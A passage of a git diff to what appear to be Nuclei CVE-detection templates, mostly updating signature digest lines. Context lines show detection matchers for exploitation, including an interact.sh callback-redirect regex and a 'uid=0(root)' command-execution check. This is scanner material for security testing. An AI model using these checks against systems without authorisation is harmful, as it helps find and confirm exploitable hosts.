'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402202d84930cb8b07dd0eb26a98602bbf8dc8da3787ba2ad4f1feac2323daf66b1e8022016850c31755e607813ad782c1ce378c731c67da55897ecc3143b66090de9b4d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e79c1582782e256f4c170be3644b4aa1750644406f5aa9f6aabaa479d4fc3c3b0221008572a7692cfd85fbd54a2addad6657b3b995b0bfe89bc8b5cfd2bdb76f8b26cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36646.yaml b/http/cves/2021/CVE-2021-36646.yaml index 74650080aed..1791c5e1843 100644 --- a/http/cves/2021/CVE-2021-36646.yaml +++ b/http/cves/2021/CVE-2021-36646.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca52be6864810b84d143246202b010b07c2c9ad86b3c458672313b2ffcae9ea702210093a81b26ddd3c42d8bf5211342e2b7879920172bcbfa53a5d253a7272a547574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077ebb4659beece810e7c1e45356bae9086db50cb357c0822b80690626d0ad52c02206a2462d8dac705348491f9e93015b8646d5c918c6ad22fb50740499789fa9a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 04e4a68bf06..c37189c89ce 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -69,4 +69,4 @@ http: regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true -# digest: 4b0a00483046022100b32668ce3b3f08162590cac1aea19b18693d6bf9ff9f9fd87f66c5a5a22ee04b022100eb7c95beb67cfe57b01da2df131be2daf12eed2e9bba32540d2b378fcbd6c699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a51b651a2c407c10bae43609f9d761a22e3c88a401e3c0f0cb167bf5ee011a002207910df9b500e3f3e48c141a59a7265cf0414a56a0d93d8efc00d5eee3405f391:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 104317b22ce..46749a59463 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -52,4 +52,4 @@ http: part: header words: - "text/html" -# digest: 4b0a00483046022100bef1ac84a6151d40cdf6a78d7cbffd3bd9cdc2f177c4d2eb2710d968bc795a3302210091add0f56d9bbbd3ff22e9439440edddd9d478135a60c7937d805ed1088b9724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8c1052d57b6392b9c1d1f044aeaf9aa3605a882b46c8dd4d3aec0ea2cf2bb64022100a9dcabdd811e2a7baae436be62c7e87f7655c0cbe48762bf2ae15d44d3c0b488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37292.yaml b/http/cves/2021/CVE-2021-37292.yaml index 05fac3f8c95..78917ef5c28 100644 --- a/http/cves/2021/CVE-2021-37292.yaml +++ b/http/cves/2021/CVE-2021-37292.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e2ec368544340e65742168b1ad188434992e13153040098a5396ca5018d9b2402200565c88d1817bffe13f8cf47c4c8b8e393c742d86d96c64584a6fdd3e8da8200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c7a29819a0e81609bbf7489302ff7103ff2d54af0c2ca257dc2cf20265e7dd00220386d020d78ed4487c7f19d777a55e8efc4085988773dd0cec230d524ddec828f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 55c2fddb0d3..32545a44528 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220154cb24e1df75d278a0a07cd8cc45490396eae11943616f4111b14e7e77fa1e20220520cc0c4b2803b164ebffc576ae4089e6579a851ecd0d7e8b9a43ce1161e5a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053cd35b9e6e51b8e8d84da4e46f18d129de4da0f8b296c3448079e1b48be26d502204a779b2cd81c5c8baaf6b48a3261aa2ffd0d500b8f9884d5ee455cca3097aaa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 902c85acbab..3ce90ac6d59 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 404 -# digest: 490a004630440220267a3ac7725df28bf5c6035aac11a2b08b40a7783fe39ce81876b58eb2f72cad02203047da2bf7a977f44cb1975de109e38da81c8dbd44a9c2e427f2200986070b55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207193adfa2b86092f5a62c82cc3b56804f13243a444644bd74ec056d645d4db1f022100faa7ee8d6c11db7bb7ecfe77a1d0630766b63962f477f93a29d80ea1e82c6209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index 811fad11b8e..1cebff549a5 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -65,4 +65,4 @@ http: - type: dsl dsl: - "status_code_2 == 500 && status_code_3 == 200" -# digest: 490a0046304402204b95c7a0e7e7d4fb2bf060cdfb5df00be189e4573f50a690585a88dea5f95b9d022015a8c8fd1de97985472b6bc20faec883cb3cb4e05dea920a442ba09f11e90644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220784b9a0bf2060f69308812809d6b94cab7fb7ce1f9d3746f362644dba75a0977022078ced9781dd98701eac376b73595ce5860f1f9b3a2695b91f33cb4e4c1a4598a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37598.yaml b/http/cves/2021/CVE-2021-37598.yaml index 661851fc57f..2c3252e7da6 100644 --- a/http/cves/2021/CVE-2021-37598.yaml +++ b/http/cves/2021/CVE-2021-37598.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e3a2a3bd1b09d6c8ec20536a1ef7fa6344446530ea7318442901b509ec6b027f0220141240185acccaf51d5e30b0709c1fa9bcaa77f8b6f9b42f848650f014ebddb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093fb3e9648120fe1aef190094c89e6daad0db5991b07302b7140a34b2d75a8a80220354f088618dfe1bb6bde3b1e3dddde385727905618efa52205b8859cce0d592d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 79077563f57..f540b1552b9 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -55,4 +55,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body -# digest: 4a0a0047304502206e72579fc9dc4601644d6a6a64a22a79ceaf6989bfa94c3781816b11841de49e022100dbd0004d93646af29a08277cc7867f15b086fd15e1138dbb10cbca52596a514a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220312ed004cf816f230a48ef9221f7db8ca86a59601bac20e3ccc84e5161b565a8022100fe1614d59ccec659055136a41b5ca381457ad88265f95824cbbb8885c559b4f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index acd4f73bbbf..419bf20d943 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e2f1ef7ffc3134ef24b6c25f657f998158c1ffd8742aaacbe6f5dc6ef40c7a5022100dfd27a1c8f7513da43ed04d7598ce82f2c0347656137b86467b5a71f6a25725f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d658dea9f5298d6a2ac9b116027dcaff6b218dc70f3f4ed1e69260e57ad9fd0d02202db0fddbfaa0c313bbfdc0788ba5c15d8b9a31e09a25a6420d7d9ec3285503aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml index 0b09b212d0a..b31511ae7f9 100644 --- a/http/cves/2021/CVE-2021-38146.yaml +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220116f198903b1cfaaa2958dda7f5e62b880d77158c49b5e168488767f3fcb6c44022100ac3b5d967819d5145c2878bd306c86c3901e977272c27d50afa4a25f26aba427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008cf460638fc667feccba66f54428e6656200c2798d2169b7e74284a69b1fd03e022100efb98b9c97a01efa9ff43ec2ca9507d17db7d87325f833eda8d838150cb132e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml index 6394ac2d3c9..4a25d1f1e06 100644 --- a/http/cves/2021/CVE-2021-38147.yaml +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -45,4 +45,4 @@ http: - "contains(body, '' - 'uid=0(root) gid=0(root) groups=0' condition: and -# digest: 4b0a00483046022100dc2ca0497a07384cde63fef66811875271fc9bb4e6c23cc738e7a012b0387508022100816b53c3301929dae5e41cb5ccaed3b327732c1b6b976082f90272ac99860e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220477d8bd9b4fba00595e4cd20b1a5f6db4d22fd20c5af4097d3a09fcdfe1ccf94022100ee6b1b8195ed31ca7c6d0f0aef576cdac4a3342d44ef8cce6b29ebbaaeb235ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 40f438eddaf..25f730ac42b 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022054f41ff6243ad964ef09d02783cf70a45ea6cfa3da2eaf4e423dd1f71d4a8126022100f90566e83538eb86d8249efc1d1a032303665bd4a9d55825f08e4286eaa56e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6a16b7e310a8f12807fe254497b96ced8bd0afdaba95fd401887f2fb2d06a77022100ab68ef30f1d7498ea5bbc054e3be05f7b0f7aaa93289bd91a049d046a26da263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index cc57d0b1510..14a7bb8a4e5 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab4a7d2009108fea40aa92180abdf443929aabc81b2e830b6be84c44afc70a26022040e71d533de95275616eda2c4fb72bbe12698f51803f0d62e80842b771de266b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a08c0e5cef96596b36ada990b1fd0b43b59fe4bf8b1024c501f1126ab8b37928022100e864bd68e92f530160937ea3a45f0c735145804d8aefb8fcb1354da27b2fd47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index 2616f07424c..0d9167704f4 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022038a9f8e2f36b4b113e422fe7186296b4524e91afed3ff3a6040f4eb10bc5b5ba022100ea58370f5846ddc1a367cb0dea921cc7b416ffd8ef5b60a630790afa9a9d103d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0e663267f259c2428cb1d5d73baa1b3b8740c99c7e15296267d6bcfb6f435480221008e8089540a4aee19ad36b49b2ebc6b665db992900496cb0384535f14345ad864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml index 20570ed9303..de39ede23d1 100644 --- a/http/cves/2021/CVE-2021-39141.yaml +++ b/http/cves/2021/CVE-2021-39141.yaml @@ -232,4 +232,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100ef454aa18ff5bf1e223c10d1f43eaf0735fb8d30b79c57ccbce0dbc448c5cdf5022039342239373c8a5b8b6f275438dda102d0b893567125929d33721b446f37fb6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022bdc25fef275d6bc48a96dcf2562001ca656eb5f897dc9ef722d72ec25e6a1202205d1b5457ebb9be5ffeb902038a8adbcff6173c999536da7aa617485766f643b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 81593978d2a..a15fe6f85c8 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -119,4 +119,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100f147ececb8169934a17530d390fb5361376598235f2fe05aeb0eb2fdc010c62602200b4e23730a77dda809c5e04f8cb80cd1944641d0886e930da18b8126682686ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220226de259a83638abcedd9e678c22d53b66aaa9afdf57d92183e964e62560d9b702205cbb21b615152837598f15fe4188c8c56a6557c4bbb5b366021182e6144800da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 45e33c5fe4b..b36fb9c4371 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -73,4 +73,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 4b0a00483046022100dd7d25eb2ea5972b9b8e5250a4863704bc34147e2ce7254143db87dea25a8f9b022100a8e1e13bd4958c229e14eb8676e4ab7de2fb4f0e1639c188e3e595c5ffe864a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203da19ad8af313a07cd687f6c828d40e93636aae8d49419851401545676f0fa8a0220405de08bbe5476e1fad60d38c504b4825822f79469a374678da79d4da86f3f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index ab75de2b508..adb80ea0af0 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and -# digest: 4a0a0047304502205d932145d8d7b373fe2e4d70dbe0c98857485944c24b927daa67e434cc3f7c6002210090fcfbe52d893bc322356581c10dd02a713d219ca6ad8abc1f448a9204356b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220753a625b8262ff02f6af71a3576df42d500f61108883f29074a43ca530dddfec022069461439924a3bcbbb718499824c6a19862f216f2d14b2da86b6a3c58d60c8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 09a7db340e0..f2385fb8230 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c901bc1035586d299b491ee91c5f754b1719dda71509dfaf5cb46ba2c86add97022100d721344f6b1bcb4722f12e03e5328c5955c9586df6d2ca2fe51f1a134529bc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4eb486a62003c8491cb16a61672414db831405970c1ac513deffbbcc456003b022054e8356cefdf60bc79ae9e7a942abc0609a151901dea38589e4ac28f6c2d39e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index f003ab65c20..7f4809afe88 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100846595977993c5c40e5771df07f0515f5502eb32697bc343deb37a0c153778d30220035cd4f2fbdabc72226c8b170fc826aa9b6bb8c2d8a9ac8d2bd5a3d9fac16ad4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ef9854be3cfd4f188dcf5721f4ffce3d1b2980cb144ff863cce2b339c5f4521022100c9ea5bbe71c019cba3753c6155d5fa2eaca2ca60209412c8e2e7146908f15027:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 28782b04f5e..50038dcacef 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203115e0ba986ad919b1198723d4542933e2fafa04f2464109dc0f293f9fbe1863022100fc6dad7727159ae06bf264214aba56967a983cfdbbfb0ac7da5e67548e452a99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f95271ccd035ab0fc7adbb11e479f03cb5f0b20746ae05c23da9c7c1880137702203c9f1a48baac4f4638dca9fa75edd3661eea525c801964a1fc51bb49a1bb70a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 6695979b921..09b6c0fe1a8 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dcb75ef1f9507e770a31c1b858541af7ecc218757eb34b0f9949b290456057be022046bb11306f1cc290697750e2d58c66262ef91c2fa5e1bf0471c6c1e7663065a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202489e89e742a0151e1cc883f9b7fed16c87ae68c15161aa2a89ad0750176f7bb022100c010e2c4d13d97d0e4d8ffa3de76ea18404994005e5fbc9f285115fbc5ffb523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 94619b021f7..d39dc2bdbf0 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220448dab8e88b54ebbf10a7cafdd096a97c8133d1ed191815918940db8214307a9022018235b5ccaa59e05a0649970d0a25a9c3537abc9cd2c666f406753efc10f220e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009563f170c34872fbb4abe5fd28b0f1b54a7a47477d0988fe03cee32ed708007d022100e2a789b57b4964a1c844880ba42955408fa7b5709a62af74c3eb20002b442a72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39341.yaml b/http/cves/2021/CVE-2021-39341.yaml index 077eb17cb5b..02d4a2e6bd1 100644 --- a/http/cves/2021/CVE-2021-39341.yaml +++ b/http/cves/2021/CVE-2021-39341.yaml @@ -48,4 +48,4 @@ http: - '"functions.php"' - "Server Info" condition: and -# digest: 490a0046304402207143cc99bc6c95050dc8bcce47e7240d17a34bb716dd9631492dce9391712f2e02206b52a518bc0d6f72a7c3136018ff9d49213b975b54586a3c3bcc2ad6cb26cced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a04f68cd70abde2bdc91f757b954518a169860ed550ca8c524444687fcb496b02201cfe7d1a995b6690485f08867ba18a6369e522db986fa9a237b924fa369a3133:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 71024f30949..b3e64cab741 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f42b3eb2198bcb03874847cb86d686f19384dd753051c285ec6ac5b0f7d56ed9022051de9b6b4742854d0f71350b436afd9e2fed87fb69684cb7b379887c682cf23e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022061eae5a92e8e06d384c91b6de6cc0fc58862bfa7359c70caf1757b060e07324c022100ba4cb3b6a1be4f88c94b0e1caace59b76e4dd1839d9169dd694262c558d53094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39411.yaml b/http/cves/2021/CVE-2021-39411.yaml index 7a402a60651..063f2951587 100644 --- a/http/cves/2021/CVE-2021-39411.yaml +++ b/http/cves/2021/CVE-2021-39411.yaml @@ -64,4 +64,4 @@ http: - "status_code_2 == 200 || status_code_4 == 200" - 'contains(body_2, ''Result against \"\" keyword'') || contains(body_4, ''Result against \"\" keyword'')' condition: and -# digest: 490a004630440220275f6fb59a9d7f1f5e6522a1bc824fdd5996b9a73cc823799279c8989eb0841502201f33532f5cec67483b19841f3e6c6378751e5f19b03bd041dfa97b105d4f1071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3632d8a97450a1841204ebd25f9029250b9bf9f354a68bf16d5afe4c58a4c3f022100a7e9a3b5c2489ad199f63805fb10dda5a776cf08403facfe8d07458a18985988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 8d0971239ce..4d6e817538e 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3221c409eccbe84f92776a12f9f12e91cac84e5560ed07f787d0322268013b30220534920afbb76d6760aeafc7c98f7aa75370c537156c15fbe1cf1a2429c42cda2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201d23cca6750cdbed571814f0ad60c54b1c0282b36740111a8532c0f73e7b8865022012d375e17e2b766295c9c524943b2f48a7e076b1429b3fe55bf6166e4d5bebee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 706b01bb022..f33bd7ed766 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004c5cac33b6a67ceb08c2b851dbebc4e2bc5911d79e0896333cf1a729e953f820220465769e4f55b963b8d3f03d137e237562ef7459384d19ebbb4c4234d783b9c02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061ce27ffcebc058bdb1584748ef4f613b59bf2102e573fc9c574c947547629a002206911bfa49cffe8abd39963289ea9aab6c8ed5bd5e28ef5483d87a898e6982f8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40272.yaml b/http/cves/2021/CVE-2021-40272.yaml index 909019ae260..82d964f101c 100644 --- a/http/cves/2021/CVE-2021-40272.yaml +++ b/http/cves/2021/CVE-2021-40272.yaml @@ -47,4 +47,4 @@ http: - contains(content_type, "text/html") - status_code == 401 condition: and -# digest: 490a004630440220315834c153d32a93d377c1b465518962bb4cafdd760d4902053d3b5649e932f602203178b16c8ef95c5a00566a7e485d60ce7ea647a4c9db8123ad23abb83d541dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab05d76c83d99c68e45ebdfd7b2b23c31b0e4df27709d6c3f06e2591b0261144022031227ee26cca9bc2d985791ccb76b70f6abc8c02211efc940ca3d5d7b4a29d7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 57420a951c2..45cdab2f1ec 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -126,4 +126,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220621177f4ff1b1b370350e9dc7803f03b97cfb7390af2079b37b7e65d29e63d8302207560cb008bd758c079b6a4e076f25ecbc318c0cfb5ca757fcf3efc50de1efdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba3373abfcafc40e7a4ee2ea04efc341d624b43d720a1b51ea1a54614ab51e0702210081f6d9f5a27db6bbc150fc90fca36eefac2ea356ef4c4ae7d2a416f3ef1b9202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 32ce1f6dcf0..07e8e8ee4f9 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022064223fd4b095c7dff387b829f315ecccfc68c665a6c247ba00da1ba9a0acdf16022028e44c1974153f68c875d7fc6307cb882141a83641088de52a4c8a400c821bc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f27cfbfef4b49af3c29ff9d655b68d92e46e7db3e46979d72c95a8c37ad062410221008eb1427b627f2aa7445d848cc4b1242a137a84717cc664533499fd913ed2c73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 5987c7aab02..66c19188c28 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204afd02b6bbe54eec14f4e73fc059f8f7d077c52034fc9e2bbfce29f8b3f7b3a7022100c94578a3210b7545a5c9cc5c4e8f5f558e0f5173911b9a62448cf3654c058b90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be26513b3103bf0c6a66ec77027e6ff6d8ac7ccae60858b9d00cda56d67b854f022100fa55befe28265982e31bb8868b818d4af85b6795694e207709f22b22baada61c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 8ab978a26c5..08f333ecdda 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220708f127293ea4e625bb535cc2fa9f3136ca38e3c4085ca4a48ae27dd583f85f102200d3672930ca7cb15f5a94a2e3630c19ce3ac1db2767a37981ab82ee18d85d585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203fef8d6a92b279169c8d1a8e2602367adb6d2984e42263d5fdd1c504288168c9022100bbd6e8ada6606d5b9eca0ac22c945df4dde74634095308c6c89eac34ff8cea02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 411e3ab1ee5..51f478f0620 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008664180df3ef6ab791d3c7200c4cdf4ce68850d7653af42881d7edda8714087302203267ef7682963a9add87f6790cf65086b6c2158f85d5c3fd5f4f3b96de0e5090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ac834789915e8854eb660530edfe93101907bdd6e680976ae27ebac674b230b022100d3215d1fd1bf5759cf0cd37739b60a02e36b71c117795c7d47da27ca61238654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index d69554d0528..8f219d3924f 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 